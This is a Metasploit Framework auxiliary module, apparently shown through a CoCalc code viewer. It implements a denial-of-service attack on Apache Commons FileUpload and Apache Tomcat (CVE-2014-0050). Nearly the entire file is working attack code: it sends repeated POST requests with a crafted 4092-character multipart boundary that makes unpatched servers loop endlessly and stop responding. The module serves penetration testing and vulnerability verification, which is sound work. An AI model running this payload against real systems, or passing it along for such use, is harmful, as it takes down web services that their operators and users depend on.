Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',

15
        'Description' => %q{

16
          This module triggers an infinite loop in Apache Commons FileUpload 1.0

17
          through 1.3 via a specially crafted Content-Type header.

18
          Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle

19
          mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50

20
          and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also

21
          uses Commons FileUpload as part of the Manager application.

22
        },

23
        'Author' => [

24
          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.

25
          'ribeirux' # metasploit module

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2014-0050'],

30
          ['URL', 'https://tomcat.apache.org/security-8.html'],

31
          ['URL', 'https://tomcat.apache.org/security-7.html']

32
        ],

33
        'DisclosureDate' => '2014-02-06',

34
        'Notes' => {

35
          'Stability' => [CRASH_SERVICE_DOWN],

36
          'SideEffects' => [],

37
          'Reliability' => []

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        Opt::RPORT(8080),

45
        OptString.new('TARGETURI', [ true, 'The request URI', '/']),

46
        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])

47
      ]

48
    )

49
  end

50


51
  def run

52
    boundary = '0' * 4092

53
    opts = {

54
      'method' => 'POST',

55
      'uri' => normalize_uri(target_uri.to_s),

56
      'ctype' => "multipart/form-data; boundary=#{boundary}",

57
      'data' => "#{boundary}00000",

58
      'headers' => {

59
        'Accept' => '*/*'

60
      }

61
    }

62


63
    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby

64
    # This should be rewritten with 1.upto() or Enumerable#each or

65
    # something

66
    for x in 1..datastore['RLIMIT']

67
      print_status("Sending request #{x} to #{peer}")

68
      begin

69
        c = connect

70
        r = c.request_cgi(opts)

71
        c.send_request(r)

72
        # Don't wait for a response

73
      rescue ::Rex::ConnectionError => e

74
        print_error("Unable to connect: '#{e.message}'")

75
        return

76
      ensure

77
        disconnect(c) if c

78
      end

79
    end

80
  end

81
end

82


83